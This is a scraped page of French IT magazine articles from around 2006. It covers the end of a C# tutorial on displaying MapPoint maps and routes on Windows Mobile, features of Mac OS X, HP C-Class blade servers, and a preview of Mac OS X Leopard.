Le reste du développement pour Windows Mobile ne diffère pas fondamentalement du développement Windows / DotNet classique. La seule difficulté réside dans la limitation de certaines API. Il n’est pas rare en effet que certains objets, méthodes, variables, constantes, délégués, etc., des API DotNet 2.0, ne soient pas disponibles pour l’environnement Windows Mobile. Il faut alors trouver une solution alternative. C’est la pertinence qui différencie les bonnes applications mobiles des autres !


À la découverte de MapPoint

Venons-en maintenant à la partie MapPoint. Comme tout service Web, MapPoint attend des données en entrée, données qui généreront le renvoi d’autres informations pour traitement ultérieur. Dans notre cas, comme dans beaucoup d’autres, ces traitements se limiteront à l’affichage, en l’occurrence celui des cartes dont nous auront spécifié les « coordonnées ». Cet article n’a pas vocation à remplacer une introduction technique à MapPoint. Le site de Microsoft offre à cet égard un grand nombre de ressources dont la qualité est, comme souvent, assez irréprochable. Il faut cependant savoir que MapPoint expose quatre grands services : la localisation cartographique à partir d’une adresse, le rendu graphique des cartes (avec indicateurs visuels de repérage), le traçage de routes entre deux adresses et, enfin, l’origine des informations cartographiques. Afin d’utiliser MapPoint, il est nécessaire de référencer le service Web dans le projet. Pour cela, cliquez droit sur le nom de l’application dans l’explorateur de projets, choisissez « Ajouter une référence Web », saisissez l’URL :
http://staging.mappoint-.net/standard-30/mappoint-.wsdl
… et cliquez sur « Ajouter la référence ».

Figure1.jpgFigure 1
Nous allons commencer par exploiter le premier service à l’aide de la première interface de notre application (cf. Figure 1). Cette interface, simplifiée à l’extrême (un signe de maturité pour une application Mobile – surtout lorsqu’elle est susceptible d’être utilisée en voiture), permet de saisir une adresse. Une fois l’adresse saisie, il suffit de choisir la fonction « Afficher » (menu gauche) pour obtenir, après quelques instants, la carte à l’écran. Pour cela, deux fonctions sont nécessaires. Voici la première, qui a pour but de préparer la requête de la carte :

public static void GetMPAddress(Address address, string DataSourceName,
  out indResults Location, out ViewByHeightWidth[] Views)
{
  try
  {
    FindServiceSoap locationService = new FindServiceSoap();
    locationService.Credentials = new System.Net.NetworkCredential(
      _mapPointUserName,
      _mapPointPassword);
    locationService.PreAuthenticate = true;

    FindAddressSpecification locationData = new FindAddressSpecification();
    locationData.DataSourceName = DataSourceName;
    locationData.InputAddress = address;

    Location = locationService.FindAddress(locationData);

    Views = new ViewByHeightWidth[1];
    Views[0] = Location.Results[0].FoundLocation.BestMapView.ByHeightWidth;
  }
  catch(Exception ex)
  {
    throw new Exception(ex.Message,ex);
  }
}

Dans un premier temps, un objet FindServiceSoap est créé. C’est à lui que revient de retrouver les coordonnées de localisation de la carte que nous cherchons à afficher. On voit ici tenues toutes les promesses de simplicité de Soap dans l’échange de données entre clients et service Web. Il suffit de lui fournir votre identifiant et votre mot de passe pour le compte MapPoint développeur (ici les champs _mapPointUserName et _mapPointPassword) et de demander une pré-authentification. Ensuite, la méthode formate notre adresse selon un schéma prédéfini (rappelons au passage que MapPoint est un service Web XML). Après avoir indiqué vouloir un affichage « normal » pour la carte (cf. le tableau Views), les informations que nous venons de composer sont retournées à la méthode appelante (elles sont pour cela préfixées « out » dans la signature de la méthode).

Une fois les données de localisation obtenues, la méthode GetMPMap (ci-dessous) utilise le service Web RenderServiceSoap pour retourner à l’application un objet Bitmap :

public static Bitmap GetMPMap(FindResults Location,
  ViewByHeightWidth[] Views,string DataSourceName,
  Point MapDimensions)
{
  try
  {
    RenderServiceSoap renderService = new RenderServiceSoap();
    Pushpin[] pushpins = new Pushpin[1];
    MapSpecification mapSpec = new MapSpecification();
    renderService.Credentials = new
      System.Net.NetworkCredential(_mapPointUserName,
      _mapPointPassword);
    renderService.PreAuthenticate = true;

    pushpins[0] = new Pushpin();
    pushpins[0].IconDataSource = "MapPoint.Icons";
    pushpins[0].IconName = "0";
    pushpins[0].Label = Location.Results[0].FoundLocation.Entity.Name;
    pushpins[0].LatLong = Views[0].CenterPoint;
    pushpins[0].ReturnsHotArea = true;

    mapSpec.DataSourceName = DataSourceName;
    mapSpec.Views = Views;
    mapSpec.Pushpins = pushpins;
    mapSpec.Options = new MapOptions();
    mapSpec.Options.Format = new ImageFormat();
    mapSpec.Options.Format.Width = MapDimensions.X;
    mapSpec.Options.Format.Height = MapDimensions.Y;
    MapImage[] mapImages = renderService.GetMap(mapSpec);

    System.IO.Stream streamImage = new
      System.IO.MemoryStream(mapImages[0].MimeData.Bits);
    Bitmap bitmap = new Bitmap(streamImage);
    return bitmap;
  }
  catch(Exception ex)
  {
    throw new Exception(ex.Message,ex);
  }
}


Figure2.jpgFigure 2Figure3.jpgFigure 3
RenderServiceSoap, comme FindServiceSoap, a besoin de vos identifiants personnels. Une fois ceux-ci fournis, la méthode crée un « pushpin », c’est-à-dire un indicateur visuel figurant une pointe d’ancrage, pour bien marquer sur la carte la localisation de l’adresse cherchée. Signalons que plusieurs autres indicateurs visuels sont disponibles : il suffit pour en changer de spécifier une autre valeur que « 0 » dans le champ « pushpins[0].IconName ». Enfin, un objet MapSpecification est créé qui sert de méta-descripteur pour la carte. C’est lui qu’envoie RenderServiceSoap à MapPoint, qui à son tour retourne un flux de données contenant le bitmap de notre carte. Voilà, c’est tout ce qu’il y a à coder ! Mais avouez que le résultat (figure 2) vaut bien ces quelques lignes...


Pour aller plus loin : des itinéraires sur demande

Avec la même facilité, nous allons maintenant rendre notre application intelligente en lui demandant de tracer la meilleure route pour atteindre un point B à partir d’un point A. Notre interface va un peu changer (cf. figure 3), pour nous permettre de spécifier deux adresses au lieu d’une dans la même fenêtre, mais ces modifications ne prennent en réalité que quelques minutes à implémenter.

Techniquement, ce traçage d’itinéraire s’effectue en plusieurs étapes. D’abord, il faut créer les deux objets adresse (nos points A et B). Ensuite, il faut spécifier une source de données (voir pour cela le code complet de l’application). Compte tenu de l’architecture technique de MapPoint et de son état de développement actuel, cette source peut être une des cinq suivantes :

MapPoint.EU = Europe
MapPoint.NA = Amérique du Nord
MapPoint.BR = Brésil
MapPoint.World = Le monde entier
MapPoint.Moon = La lune

Oui, vous avez bien lu, il est possible de demander à MapPoint le traçage d’un itinéraire optimisé pour aller d’un point lunaire A à un autre point lunaire B ! Nous nous bornerons aux itinéraires européens, et pour cela, nous allons devoir dans un troisième temps identifier la latitude et la longitude des deux adresses. C’est tout l’objet de la méthode suivante, calquée sur la méthode GetMPAddress précédente, qui pour ce faire met en œuvre un objet FindAddressSpecification :

public static LatLong GetMPLatLong(Address address, string DataSourceName,
  out FindResults Location, out ViewByHeightWidth[] Views)
{
  try
  {
    FindServiceSoap locationService = new FindServiceSoap();
    locationService.Credentials = new System.Net.NetworkCredential(
       _mapPointUserName, _mapPointPassword);
    locationService.PreAuthenticate = true;

    FindAddressSpecification locationData = new FindAddressSpecification();
    locationData.DataSourceName = DataSourceName;
    locationData.InputAddress = address;

    Location = locationService.FindAddress(locationData);

    Views = new ViewByHeightWidth[1];
    Views[0] = Location.Results[0].FoundLocation.BestMapView.ByHeightWidth;
    return Location.Results[0].FoundLocation.LatLong;
  }
  catch(Exception ex)
  {
    throw new Exception(ex.Message,ex);
  }
}


Comme pour la cartographie simple, deux variables préfixées « out » dans la signature de la méthode renvoient ces éléments sous la forme d’un objet « LatLong », dont les données sont utilisées par la fonction suivante, chargée de l’obtention d’une carte sur laquelle est dessinée la route :

public static double GetMPMapForRoute(out Bitmap[] RouteMaps,
  out ViewByHeightWidth[] Views, LatLong[] LatitudeLongitude,
  string DataSourceName, Point MapDimension)
{

  RouteServiceSoap routeService = new RouteServiceSoap();
  routeService.Credentials = new
    System.Net.NetworkCredential(_mapPointUserName,_mapPointPassword);
  routeService.PreAuthenticate = true;

  UserInfoRouteHeader routeUserInfo = new UserInfoRouteHeader();
  routeUserInfo.DefaultDistanceUnit = DistanceUnit.Kilometer;
  routeService.UserInfoRouteHeaderValue = routeUserInfo;

  MapOptions mapOptions = new MapOptions();
  mapOptions.Format = new ImageFormat();
  mapOptions.Format.Width = MapDimension.X;
  mapOptions.Format.Height = MapDimension.Y;

  Route route;
  route = routeService.CalculateSimpleRoute(LatitudeLongitude,
    DataSourceName, SegmentPreference.Quickest);
  int MapDirectionLength = route.Itinerary.Segments[0].Directions.Length +
    1;
  Views = new ViewByHeightWidth[MapDirectionLength];
  RouteMaps = new Bitmap[MapDirectionLength];

  Pushpin[] pushpins = new Pushpin[MapDirectionLength];

  for (int idx = 0; idx <= MapDirectionLength-1; idx++)
  {
    pushpins[idx] = new Pushpin();
    pushpins[idx].IconDataSource = "MapPoint.Icons";
    if (idx != MapDirectionLength-1)
    {
      Views[idx] =
        route.Itinerary.Segments[0].Directions[idx].View.ByHeightWidth;
      pushpins[idx].IconName = "0";
      pushpins[idx].LatLong =
      route.Itinerary.Segments[0].Directions[idx].LatLong;
    }
    else
    {
      Views[idx] =
        route.Itinerary.Segments[1].Directions[0].View.ByHeightWidth;
      pushpins[idx].IconName = "1";
      pushpins[idx].LatLong =
      route.Itinerary.Segments[1].Directions[0].LatLong;
    }
    pushpins[idx].ReturnsHotArea = true;
  }

  MapSpecification MapSpec = new MapSpecification();
  MapSpec.DataSourceName = DataSourceName;
  MapSpec.Options = mapOptions;
  MapSpec.Views = Views;
  MapSpec.Pushpins = pushpins;
  MapSpec.Route = route;
  MapImage[] MapImages;

  RenderServiceSoap renderService = new RenderServiceSoap();
  renderService.Credentials = new
    System.Net.NetworkCredential(_mapPointUserName,
    _mapPointPassword);
  renderService.PreAuthenticate = true;
  MapImages = renderService.GetMap(MapSpec);
  for (int idx = 0; idx < MapDirectionLength; idx++)
  {
    RouteMaps[idx] = new Bitmap(new
    System.IO.MemoryStream(MapImages[idx].MimeData.Bits));
  }

  return route.Itinerary.Segments[0].Distance;
}


Figure4.jpgFigure 4Figure5.jpgFigure 5
On utilise cette fois le service RouteServiceSoap. Après lui avoir passé identifiant et mot de passe, nous lui indiquons que nous voulons une cartographie à l’échelle du kilomètre (cette valeur est ici passée arbitrairement pour des raisons de simplicité). RouteServiceSoap retourne une méthode appelée « CalculateSimpleRoute » à la fonction appelante. C’est à cette méthode que revient de calculer l’itinéraire. Elle le fait finalement assez simplement, à partir d’un tableau de latitudes et de longitudes, en donnant comme résultat du calcul un objet Route.

Dans la deuxième partie de la méthode, cet objet Route va donner naissance à un tableau de cartes – autant qu’il en faut pour afficher la route calculée selon l’échelle que nous avons spécifiée plus haut. Les mêmes icônes que pour la localisation vont cette fois servir à indiquer visuellement le point A et le point B. Et comme de juste, c’est le service RenderServiceSoap que nous connaissons désormais qui va, au final, se charger d’envoyer un flux de type Bitmap à notre SmartPhone. La figure 4 montre le résultat. Là encore, pas mal pour aussi peu de code…

Et pour finir, un petit bonus ! Il ne vous a pas échappé que notre méthode GetMapForRoute retourne un entier de type double. Pourquoi ? Pour nous permettre d’afficher la distance entre A et B en miles ou en kilomètres (cf. figure 5). Cette donnée, dans notre exemple, reste une indication statique, mais si vous connaissez le débit horaire moyen des véhicules à cet endroit ou votre vitesse moyenne de marche, il y a de quoi optimiser finement l’application…
Apple
Réduire
Mac OS X et le poste client
Par Jacques Halé - Copyright L'INFORMATICIEN, tous droits réservés

Depuis plusieurs mois, le monde Apple traverse une période d’évolution majeure sur le matériel, en attendant la prochaine version du système Mac OS X, connue sous le nom de code Leopard (lire p. 42). On vante encore la simplicité du Mac, mais est-ce toujours vrai ?

Branchez-le et ça marche ! Ce slogan est vieux comme le premier Mac, en 1984. Et il en est bien ainsi aujourd’hui. Dans une grande majorité des cas, vous n’aurez même pas besoin d’installer de pilotes pour votre matériel, le système embarque de très nombreux pilotes. De plus, Apple a réalisé un travail considérable pour maintenir la compatibilité entre les Mac G4, G5 et Intel. Ce qui est un gage de pérennité.


Les gadgets…

Un des éléments les plus appréciés de Mac OS X est l’outil Dashboard. Celui-ci permet d’accéder à de mini applications appelées widgets – ou encore gadgets. Une widget remplit une fonction précise. Par exemple : récupération de la météo d’une ville, suivi d’un colis UPS, obtention d’un horaire d’une compagnie aérienne, du trafic réseau, etc. Aujourd’hui, environ 2 000 widgets sont disponibles sur le site d’Apple. Tous les domaines ou presque sont couverts : développeurs, réseaux, jeux, images, sport, etc. Pour les utiliser, il suffit de cliquer sur le bouton Dashboard du Dock. Chaque widget possède des paramètres de fonctionnement que l’on peut ajuster. Les informations que la widget affiche sont récupérées sur Internet (il faut être connecté). L’interface de ces mini applications est en général très simple et rapidement compréhensible.
(Site officiel : http://www.apple.com/fr/downloads/dashboard/ )


Des fonctions système bien utile

Faciliter la vie de l’utilisateur constitue l’un des credo d’Apple et de Mac OS X. Pour ce faire, le système propose toute une série de fonctions facilitant l’utilisation au quotidien. L’une des plus appréciées est le nouveau moteur de recherche : Spotlight. Il permet de retrouver, dans n’importe quel document, des fichiers contenant le ou les mots indiqués dans la recherche.
Pour réaliser cela, Spotlight indexe tous les mots et les contenus de tous les fichiers présents sur vos disques durs. Surtout, il se met à jour automatiquement à chaque nouveau fichier enregistré. Et chaque recherche peut être enregistrée. Par ce biais, le résultat de la recherche évolue automatiquement (si vous supprimez un fichier ou en rajoutez un contenant les mots de la recherche).


Nettoyer son système
Si Mac OS X demeure un système de référence dans l’ergonomie et l’utilisation, il s’avère plus compliqué à nettoyer que Mac OS 9 à son époque. Il existe une multitude de dossiers et de librairies systèmes. Il faut naviguer dans les nombreux dossiers de son profil utilisateur, etc. Difficile de désinstaller une application à la main. Si vous ne souhaitez pas plonger dans ses entrailles, quelques outils vous faciliteront la vie et permettront d’optimiser le système :
• OnyX : l’un des meilleurs de sa catégorie. Il offre une très large panoplie d’optimisation. Permet de nettoyer de nombreuses préférences et de maintenir les « registres » internes. Attention, certaines opérations prennent beaucoup de temps.
• DoktorKleanor : shell script Unix, il a l’avantage d’être très rapide. Moins fourni en options, ce petit outil permet de nettoyer les ressources inutiles et de gagner des « Mo » précieux sur le disque. Permet aussi de réparer plusieurs applications (Safari, Word, etc.).
• Monolingual : les applications Mac OS X supportent souvent de nombreuses langues. Cet utilitaire permet de les supprimer. Vous gagnez beaucoup de place sur le disque dur !



Au niveau ergonomique, la fonction Exposé permet de rapidement changer d’application et d’afficher le document adéquat. Si, au début, on est quelque peu désorienté, on s’y retrouve très rapidement. Toujours dans le souci d’aller vite, la colonne de gauche des fenêtres Finder et des dialogues d’ouverture et de sauvegarde autorisent l’ajout de dossiers.
Autre astuce, peu connue mais terriblement pratique : lorsque l’on change de machine, pour récupérer ses données (paramètres système, réseau, messagerie, etc.), il suffit de connecter un câble FireWire et de mettre l’ancienne machine en mode Target, et la nouvelle machine récupèrera les données.
Une autre fonctionnalité méconnue est le menu Service. Les services sont des fonctions inter applications. Vous pouvez accéder à une ou plusieurs fonctions d’un autre logiciel sans avoir besoin d’y aller. Par exemple, vous avez sélectionné le texte d’un document et vous souhaitez l’envoyer par mail. Dans le menu Service, l’application Mail est accessible et il suffit de cliquer sur la fonction voulue (ici, Envoyer la sélection). Malheureusement, les éditeurs oublient trop souvent d’être compatibles avec cette fonction !


 Utiliser des applications Windows sur Mac OS X

Il est parfois intéressant d’utiliser des applications Linux ou Windows sur un Mac. Jusqu’à présent, les solutions étaient peu nombreuses (ex.  : VirtualPC). Apple propose depuis quelque mois l’outil Boot Camp. Il permet de créer un double démarrage (double boot) sur un Mac Intel. L’utilisateur peut démarrer sur Windows ou Mac OS X. Cependant, les deux systèmes ne peuvent fonctionner simultanément. Pour pallier cette faiblesse, il existe Parallels Desktop. Directement sous Mac OS X, on installe Linux, Solaris ou Windows. Un autre projet est en cours de réalisation : CodeOver Mac (CodeWeavers). Il s’agit de pouvoir utiliser des applications Windows sans installer Windows, avec un bon taux de compatibilité, dixit l’éditeur. CodeOver Mac s’appuie sur les librairies Wine.
La compatibilité avec Windows ne s’arrête pas là. Mac OS X supporte les protocoles Samba, SMB/CIFS. En quelques clics, on partage des volumes et dossiers entre Mac et Windows – ou Linux. Il s’intègre même dans des annuaires de types LDAP et Active Directory. Le Mac s’intègre facilement à un réseau Linux ou Windows.



La suite iLife
Apple propose toute une série d’applications aidant les utilisateurs au quotidien. Elles sont réunies dans la gamme iLife. ILife 2006 comprend iPhoto, GarageBand, iWeb, iMovie, iDVD. Certes, ce ne sont pas des outils professionnels. Par exemple, avec iWeb vous pouvez mettre à jour des sites Web. Il permet de créer un site de contenu ou encore un blog. En dehors d’iLife, vous avez aussi iWork. Il contient deux logiciels : un outil de création de documents avec une mise en page avancée – ce n’est pas de la PAO –, Pages, et un outil de présentation de type PowerPoint, Keynote.




Automator

Pour automatiser certaines tâches d’applications ou du système, on dispose d’AppleScript. Il s’agit d’un langage de script. Jusqu’à présent, son maniement n’était guère aisé. Depuis la dernière version de l’OS X, on dispose de l’outil Automator. Il permet de créer des flux constitués de tâches. Vous pouvez combiner les fonctions de plusieurs applications pour traiter une image, un mail, un texte, un mailing, etc. Pour ce faire, on choisit les actions voulues dans la zone de travail. Vous avez des centaines d’images à recadrer, à traiter ? Vous pouvez ainsi créer un flux graphique dans Automator grâce aux fonctions système et de l’outil Aperçu pour recadrer, modifier la taille, changer de format graphique. Chaque action se configure avec quelques menus déroulant. Un peu sur le même principe, mais en plus simple, vous pouvez attacher des actions à des dossiers se déclenchant quand vous rajoutez des éléments dans un dossier.


Du PDF sans souci !

Contrairement à la mésaventure Microsoft avec Adobe pour implémenter le format PDF dans MS Office, Mac OS X propose depuis bien longtemps le PDF au cœur du système. Toutes les applications peuvent utiliser ce format. Sous MS Office, il suffit de choisir l’option enregistrée en PDF dans le panneau d’impression. Cela évite d’acheter ou d’installer des générateurs de PDF. Vous pouvez faire de même pour une page Web !
Et s’il vous manque des programmes, les logiciels libres foisonnent sur Mac OS X. Des sites comme www.versiontracker.com répertorient quantité d’utilitaires et applications. À votre souris !
Blades
Réduire
HP voit des blades partout !
Par Bertrand Garé - Copyright L'INFORMATICIEN, tous droits réservés

blade17052_Copier5.gifLe C-Class est le vecteur de la nouvelle stratégie globale d’HP.
Plus que la sortie d’une nouvelle gamme de serveurs, HP prend un virage pour unifier sa gamme autour des serveurs lames, un marché considéré comme très porteur. Destinés à remplacer les actuels P-Class, les nouveaux C-Class sont les vecteurs de cette stratégie globale. Combinant puissance et économie en s’appuyant sur des innovations technologiques, les derniers blades d’HP veulent rivaliser avec les lames d’IBM qui dominent actuellement la marché.«Blade Everywhere » ! Entre formule marketing et cri de guerre, le slogan, repris à l’envi par tous les cadres d’HP lors du lancement de la classe C des serveurs lames du constructeur, marque cependant un véritable virage stratégique du constructeur vers une stratégie globale s’appuyant sur les matériels lames. Encore marginaux dans le nombre total des serveurs vendus sur le marché en 2002 (1 % du marché), les serveurs lames connaissent une adoption rapide. En 2007, ils devraient représenter près de 16 % du marché total des serveurs et culminer à près d’un tiers du marché à l’horizon 2010, selon des études du cabinet IDC.


Mais en quoi un serveur peut être le vecteur d’une stratégie globale ? En fait, HP ne lance un produit que lorsqu’il autorise une opportunité pour toutes les activités d’HP : matériels, logiciels et services. Dans ce cadre, les C-Class en sont un exemple parfait.
Conçu pour les centres de données, le C-Class s’appuie aussi sur les outils d’administration issus de Compaq et offre des opportunités d’utilisation de la gamme logicielle Openview. Sur cette couche, le constructeur développe une offre entière de service comme le précise Paul Wagner, en charge des services au niveau Europe chez HP. « Nous proposons des solutions allant de l’audit pour intégrer rapidement ces environnements dans l’existant jusqu’à l’infogérance la plus complète », précise-t-il.
Les principaux axes visés sont d’apporter plus de puissance tout en rognant sur les coûts d’exploitation des centres de données avec ces nouveaux matériels. Pour y parvenir, les C-Class intègrent une flopée d’innovations technologiques.


Une nouvelle génération de serveurs lames

Les avantages des serveurs lames sont connus. Ils permettent de gagner en densité pour consolider puissance et applicatif sur une seule machine. Cette consolidation autorise alors de virtualiser l’environnement pour gagner en efficacité et enfin d’automatiser pour libérer des ressources en vue de nouveaux projets générateurs de revenus.

blade38998_Copier6.gifL’arrière du Blade avec sa connectique Ethernet Cisco.
S’appuyant sur le design et les outils de la gamme Proliant, les C-Class veulent à eux seuls remplir toutes ces fonctions. Annoncés en juin, ces serveurs ont vocation à remplacer à terme les actuels P-Class. Le développement sur cette dernière ligne continue avec une nouvelle version prévue pour la fin de l’année. Le support est aussi assuré jusqu’en 2012 par le constructeur.
Première innovation : Virtual Connect. Elle vise à résoudre la question de la flexibilité dans les centres de données. Les changements de serveurs dans ces centres sont bien plus fréquents qu’on ne le pense et le temps pour remplacer un serveur est souvent bien plus long que prévu. Pour faciliter la gestion des connexions réseaux, HP a rendu virtuelles les connexions au châssis 10 U du C-Class, qu’elles soient Fiber Channel ou Ethernet. Ainsi, un domaine Virtual Connect peut rassembler quatre châssis, soit 64 serveurs. Un châssis
C-Class peut supporter 16 lames, soit deux de mieux que les IBM BladeCenter. L’architecture permet d’allouer dynamiquement des ressources réseau aux lames dès que le châssis est connecté. Le fond du panier a une capacité de commutation de 5 terabits/s pour autoriser une forte évolutivité de la solution.


Une administration simplifiée

Les outils d’administration sont améliorés et simplifiés. La solution Insight Control autorise un monitoring unifié à partir de la console d’Insight Manager, l’outil de monitoring des serveurs Proliant. Ce moyen permet d’automatiser les tâches de configuration des serveurs, le déploiement des systèmes d’exploitation ou de réaliser du reporting sur la performance des serveurs. L’outil est utilisable dans des environnements très hétérogènes dans sa version Data Center Edition et dans les environnements Linux avec la Linux Edition.
La solution intègre la KVM maison, iLO 2 pour le contrôle distant des serveurs. HP Onboard complète la solution en offrant un autre module d’administration avec un panneau de contrôle en face avant qui se configure en moins de 5 minutes et qui automatise l’administration de l’alimentation et du refroidissement. L’outil réalise aussi des diagnostics pour une résolution rapide des problèmes. Il s’intègre dans Insight Manager et Insight Control. L’installation s’effectue via des assistants.


Des solutions innovantes sur la thermie et l’alimentation

La chaleur et la consommation électrique, problèmes récurrents dans les data centers, sont aussi pris en compte avec une nouvelle solution HP Thermal Logic. L’augmentation de la densité des serveurs demande plus d’électricité. Le fonctionnement accru génère plus de chaleur qui demande plus de refroidissement. La conséquence est l’envol des factures de la gestion des centres de données. La solution d’HP permet de gérer dynamiquement la température et l’alimentation en fournissant en temps réel les données sur le dégagement de chaleur, l’alimentation et le refroidissement.

blade28995_Copier7.gifLe nouveau ventilateur permet de gérer dynamiquement le refroidissement des racks.
Un nouveau ventilateur Active Cool, pourvu d’un algorithme de contrôle, optimise la configuration en fonction des paramètres de flux d’air, de bruit, d’alimentation et des performances demandées. Une nouvelle architecture, PARSEC, assure un refroidissement redondant.
Des solutions réalisent des travaux analogues sur l’alimentation : Dynamic Power Saver et Power Regulator pour Proliant.
L’ensemble des solutions permet d’augmenter encore la densité dans les racks sans rencontrer de problème. Ainsi, le C-Class dans un rack 10 U fournit une puissance analogue à celle d’un P-Class fourni dans un rack 14 U.


Une connectique Ethernet variée

Le C-Class possède aussi de nombreuses connectiques avec des solutions développées par des partenaires, comme Blade Networks (Origine Nortel), Cisco pour les connexions Ethernet et Emulex, Qlogic ou Brocade pour les connexions Fiber Channel.
L’ensemble de ces solutions vise à générer des économies importantes dans la mise en œuvre et la gestion d’un centre de données. Sur ce point, les chiffres peuvent impressionner. Selon HP, la nouvelle classe de serveurs proposée permet 41 % d’économies sur les coûts d’achats (par rapport au P-Class), 60 % en coût dans les centres de données et 94 % des coûts de déploiements. Cette liste ne s’arrête pas là ! La nouvelle technologie de ventilateur devrait permettre de réduire de 30 % le flux d’air nécessaire au refroidissement, et de 50 % la consommation électrique de ce système de refroidissement. La consommation globale d’énergie peut être réduite de 40 %.

Les lames devraient rapidement être portées sur des processeurs Opteron et Itanium (vers la fin de l’année 2006). Elles ne sont disponibles actuellement que sur des Xeon. Les serveurs devraient de plus être rapidement étendus à d’autres usages. Ainsi, une version « sites distants et PME » est prévue au début de 2007. Dès le prochain trimestre, des lames adaptées vont couvrir le secteur du stockage. Les serveurs devraient être ensuite étendus à tous les usages machine, apportant ainsi une homogénéisation des matériels sur un seul matériel. On ne peut pas faire plus global !
MacOs X
Réduire
MacOS X
Leopard sort de sa jungle
Par Jacques Halé - Copyright L'INFORMATICIEN, tous droits réservés

leopard_disc12583_Copier5.gif
On l’attendait depuis des mois. Finalement, c’est début août que Steve Jobs a dévoilé une petite partie de Leopard, la prochaine grande évolution de MacOS X. Mais Apple a prévenu, de nombreuses fonctions n’ont pas été présentées ou implémentées. Des surprises sont encore à attendre durant les prochaines semaines.


Lors de la WWDC, la conférence mondiale des développeurs Apple, le constructeur n’a pas hésité à lancer comme slogan, Leopard = Vista 2.0 ! Leopard, qui devrait prendre la numérotation 10.5, est prévu pour le printemps 2007. Au passage, le système de la Pomme arbore un nouveau logo encore plus sobre et tout aussi beau.


Restaurer plus aisément système et fichiers

La fonction Time Machine est la principale nouveauté présentée. Il s’agit d’une fonction de sauvegarde et de restauration. Elle permet de sauvegarder votre système et vos fichiers régulièrement, selon vos désirs. Et en cas de besoin, vous pouvez récupérer tout ou partie de votre back-up selon la date voulue. La sauvegarde se fait localement ou sur le serveur. On navigue dans l’historique via une vue 3D à l’aide de deux flèches (avant / arrière). Si, par exemple, vous êtes dans l’application iPhoto et que vous voulez récupérer une image effacée, vous activez Time Machine et l’outil affichera uniquement les sauvegardes liées à iPhoto… Les débuts de la 3D dans l’interface semblent ainsi se confirmer…

Outre Time Machine, il y a Spaces. Spaces est un environnement pour créer des bureaux virtuels, fonction bien connue sur Linux. Comme Apple aime bien faire simple, il est possible de faire du glisser-déposer entre les différents espaces. On peut aussi changer l’ordre des espaces.



La guerre de la virtualisation sur MacOS X
On s’attendait depuis plusieurs semaines à l’implémentation de Boot Camp dans le système. Boot Camp permet d’installer et d’utiliser Windows sur son Mac Intel mais il faut choisir le système au démarrage de la machine. Boot Camp n’est pas de la virtualisation. Peut-être qu’Apple l’introduira prochainement… L’outil Parallels comble cette lacune tandis que Microsoft a annoncé l’arrêt de Virtual PC pour Mac durant la WWDC et que VMware a annoncé son arrivée sur MacOS X ! On peut donc s’attendre à une évolution favorable des offres dans les mois à venir comme c’est déjà le cas sous Linux et Windows.




Des outils pour le travail collaboratif

Dans les applications mises à jours, le calendrier iCal bénéficie de fonctions intéressantes. Il sera possible de l’utiliser pleinement sur le Web et de de le mettre en réseau en supportant le protocole CalDAV. Pour renforcer le côté entreprise et professionnel, un serveur iCal va apparaître avec le prochain MacOS X Server. On disposera aussi d’une fonction de réservation de salles ainsi que de la possibilité de vérifier la disponibilité de chacun. Vive le multi-utilisateur !

Le logiciel iChat pour la vidéo-conférence bénéficie d’une cure de jouvence. Il devient un outil réellement collaboratif. On peut y faire de la messagerie instantanée, ajouter un fond à sa vidéo, déformer son visage (avec le petit logiciel Photo Booth), exécuter des présentations, partager son écran avec un participant... Pratique en réunion à distance !

Mail, l’outil de messagerie, s’améliore considérablement. On pourra désormais ajouter des notes sur les messages. Pour un clic, on transformera un mail en une « liste A faire » avec une date, une priorité et si besoin, une alarme. Le tout apparaissant dans iCal. Si on souhaite poster des messages avec une belle mise en page, on pourra utiliser des modèles (Mail Sationary) au format HTML, ce qui posait jusqu’à présent des problèmes de compatibilité.

Au passage, Apple améliore le moteur de recherche à indexation Spotlight en comblant une des lacunes de la version actuelle : la recherche réseau sur les volumes montés ou sur des Macs en réseau. L’accessibilité a été elle aussi revue notamment avec une synthèse vocale améliorée et bien plus naturelle. Le braille est maintenant supporté par le système.



MacOS X Leopard Server
La version serveur de Leopard n’a pas été oubliée. Là aussi de nombreuses nouveautés. Outre le serveur iCal, Apple introduit un serveur de wiki, un serveur Spotlight pour utiliser le moteur de recherche en réseau ainsi qu’un serveur de podcast ! Une centaine de projets Open Source sont intégrés à MacOS X Server (MySQL, Apache, JBoss, Tomcat, OpenDirectory 4, etc.). Comme pour la version cliente, le serveur tire profit du 64-bit. À noter qu’avec la disponibilité des premiers Xserve Intel, MacOS X Server 10.4.x fonctionne maintenant (et pour la première fois) sur processeur Intel.




Pour les développeurs : Core Animation et Xcode 3.0

Deux grandes nouveautés apparaissent dans Leopard pour le programmeur. La première est le support total du 64-bit (mode 32-bit disponible, sans émulation). Les librairies ont été réécrites (notamment Carbon) en ce sens. La principale nouveauté est Core Animation. Il s’agit d’un nouvel ensemble permettant d’implémenter des animations ou des effets 3D dans une application sans à avoir besoin d’écrire des milliers de ligne de code. Il tire profit des nouveaux processeurs à double coeur d’Intel. Il fonctionne sur tout Macintosh pouvant faire fonctionner le Core Image de MacOS, c’est-à-dire les G5 et les derniers G4.
Toujours pour le développeur, Apple a dévoilé Xcode 3.0. Cet environnement de développement incorpore la version 2 du langage Objective-C, le langage phare de MacOS X. Cette évolution contient Garbage collector, un nouveau runtime, le support du 64-bit, une nouvelle syntaxe (avec compatibilité sans réécriture du code écrit en Objective-C précédent). On dispose aussi d’une meilleure gestion des sauvegardes (avec la fonction Project Snapshots permettant de sauvegarder à un moment donné et de restaurer immédiatement, l’idéal pour tester des fonctions). Xcode 3 embarque deux nouveaux outils : Xray pour visualiser les performances et Dtrace (projet issu de Sun) pour tracer et débugger. De plus, pour concevoir plus rapidement des gadgets Dashboard, Apple proposera l’environnement DashCode. Apple intégrera aussi, par défaut, dans Leopard : Ruby on Rails, un des frameworks du développement Web 2.0 les plus en vues.
D’ici à la sortie de Leopard, on peut s’attendre à bien des surprises et l’arrivée de nouvelles fonctions. On parle régulièrement d’un Finder (l’application permettant de naviguer dans les fichiers, et d’utiliser les fonctions de base) remodelé ou encore d’une évolution du système de fichiers. Il ne reste plus qu’à attendre. Il faudra aussi mesurer la vélocité de Leopard surtout avec les applications utilisant Core Animation.


Le Mac Pro remplace le PowerMac
macpro_inside12695_Copier7.gif
